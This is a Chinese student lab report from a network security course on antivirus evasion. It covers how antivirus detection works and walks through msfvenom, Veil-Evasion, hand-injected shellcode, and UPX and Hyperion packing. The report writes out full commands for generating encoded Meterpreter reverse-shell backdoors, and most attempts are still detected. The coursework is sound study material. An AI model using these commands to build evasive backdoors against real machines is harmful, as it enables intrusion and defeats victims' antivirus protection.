2018-2019-2 网络对抗技术 20165333 Exp3 免杀原理与实践

实验内容

任务一：正确使用msf编码器，msfvenom生成如jar之类的其他文件，veil-evasion，自己利用shellcode编程等免杀工具或技巧
使用msf编码器生成各种后门程序及检测
使用veil-evasion生成后门程序及检测
半手工注入Shellcode并执行
任务二：通过组合应用各种技术实现恶意代码免杀
任务三：用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

免杀原理及基础问题回答

一、免杀原理

一般是对恶意软件做处理，让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。
要做好免杀，就时清楚杀毒软件（恶意软件检测工具）是如何工作的。AV(Anti-virus)是很大一个产业。其中主要的技术人员基本有编制恶意软件的经验。
反过来也一样，了解了免杀的工具和技术，你也就具有了反制它的基础。
二、基础问题回答

问：杀软是如何检测出恶意代码的？

基于特征码的检测：简单来说一段特征码就是一段或多段数据，经过对许多恶意代码的分析，我们发现了该类恶意代码经常出现的一段或多段代码，而且是其他正常程序没有的，即特征码。如果杀软检测到一个可执行文件包含特征码就认为其是恶意代码。
启发式恶意软件检测：就是根据些片面特征去推断。通常是因为缺乏精确判定依据。（非精确）
基于行为的恶意软件检测：可以理解为加入了行为监控的启发式。通过对恶意代码的观察研究，发现有一些行为是恶意代码共同的比较特殊的行为，杀软会监视程序的运行，如果发现了这些特殊行为，就会认为其是恶意软件。（非精确）

问：免杀是做什么？

使用一些技术手段对恶意软件做处理，让它不被杀毒软件所检测。同时，免杀也是渗透测试中需要使用到的技术。

问：免杀的基本方法有哪些？

改变特征码
只有EXE——加壳（压缩壳加密壳）；有shellcode(像Meterpreter）——利用encode进行编码；有源代码——用其他语言进行重写再编译；veil-evasion，半手工，改变行为
通讯方式
尽量使用反弹式连接，使用隧道技术，加密通讯数据
操作模式
基于内存操作，减少对系统的修改，加入混淆作用的正常功能代码
非常规方法
使用一个有漏洞的应用当成后门，编写攻击代码集成到如MSF中。使用社工类攻击，诱骗目标关闭AV软件。纯手工打造一个恶意软件
三、免杀效果评价
利用Virscan，它们集成了60多个商业杀毒软件的扫描引擎。可以上传免杀处理过的程序进行检测。

任务一：正确使用msf编码器，msfvenom生成如jar之类的其他文件，veil-evasion，自己利用shellcode编程等免杀工具或技巧

1. 正确使用msf编码器，生成exe文件
- 在实验二中使用msf生成了后门程序，我们可以使用VirusTotal或Virscan这两个网站对生成的后门程序进行扫描。
- 用VirusTotal扫描后结果如下：

由此可见不加任何处理的后门程序能够被大多数杀软检测到，下面我们用msf编码器对后门程序进行一次到多次的编码，并进行检测。

一次编码使用命令：-e选择编码器，-b是payload中需要去除的字符，该命令中为了使'\x00'不出现在shellcode中，因为shellcode以'\x00'为结束符
十次编码
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.70.135 LPORT=5333 -f exe > met-encoded10.exe

扫面结果

2. msfvenom生成jar文件

生成java后门程序使用命令：
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.70.135 LPORT=5333 x> cgc_backdoor_java.jar
生成文件如下所示：

扫描结果如下：

3.使用veil-evasion生成后门程序及检测

装veil
尝试安装后拷贝了同学的veil
安装成功的界面，输入veil指令，会出现下面这个界面
用use evasion命令进入Evil-Evasion
输入命令use c/meterpreter/rev_tcp.py进入配置界面
设置反弹连接IP，命令为：set LHOST 192.168.70.135，注意此处的IP是KaliIP；
设置端口，命令为：set LPORT 5333
输入generate生成文件，接着输入你想要playload的名字：veil_c_5333
如上图所示，保存路径为/var/lib/veil/output/compiled/veil_c_5333.exe
检测一下：
4. 半手工注入Shellcode并执行
首先使用命令：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.208.129 LPORT=5318 -f c用c语言生成一段shellcode;
创建一个文件20165333.c，然后将unsigned char buf[]赋值到其中，代码如下：

使用命令：i686-w64-mingw32-g++ 20165333.c -o 20165333.exe编译这个.c文件为可执行文件;

检测结果如下图：

在windows上运行

回连不了

5.加壳
加壳的全称应该是可执行程序资源压缩，压缩后的程序可以直接运行。
加壳的另一种常用的方式是在二进制的程序中植入一段代码，在运行的时候优先取得程序的控制权，之后再把控制权交还给原始代码，这样做的目的是为了隐藏程序真正的OEP（入口点，防止被破解）。大多数病毒就是基于此原理。
加壳的程序需要阻止外部程序或软件对加壳程序本身的反汇编分析或者动态分析，以达到保护壳内原始程序以及软件不被外部程序破坏，保证原始程序正常运行。
这种技术也常用来保护软件版权，防止软件被破解。但对于病毒，加壳可以绕过一些杀毒软件的扫描，从而实现它作为病毒的一些入侵或破坏的一些特性。
MSF的编码器使用类似方法，对shellcode进行再编码。
在技术上分壳分为：

压缩壳
减少应用体积，如ASPack,UPX
加密壳
版权保护，反跟踪。如ASProtect,Armadillo
虚拟机
通过类似编译手段，将应用指令转换为自己设计的指令集。如VMProtect,Themida
使用压缩壳
给之前的20165333.exe加个壳得到cgc_upxed.exe

还是被查出来了

还是回连不了

6.使用加密壳

将上一个生成的文件拷贝到/usr/share/windows-binaries/hyperion/目录中
进入目录/usr/share/windows-binaries/hyperion/中
输入命令wine hyperion.exe -v cgc_upxed.exe cgc_upxed_Hyperion.exe进行加壳：

还是被360发现了

任务二：通过组合应用各种技术实现恶意代码免杀

需要通过组合半手工制作shellcode，压缩壳，加密壳达到了免杀的目的
已经达到免杀了，没有检测到加壳后的文件。

不到十秒就被检测出来了，最终并没有达到免杀的结果

任务三：用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

免杀方法：先用msfvenom生成shellcode，再使用压缩壳和加密壳进行加壳。
回连不了，难受

实验总结和体会

虽然磕磕绊绊，实验内容越来越有趣了；
让我对木马免杀原理有了更加深刻的认识，但是还是很菜，需要进一步的学习；
安全意识有了提高，上网需谨慎。